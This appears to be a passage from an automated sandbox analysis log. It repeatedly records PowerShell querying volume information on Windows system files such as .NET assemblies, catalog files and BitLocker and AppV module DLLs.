                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
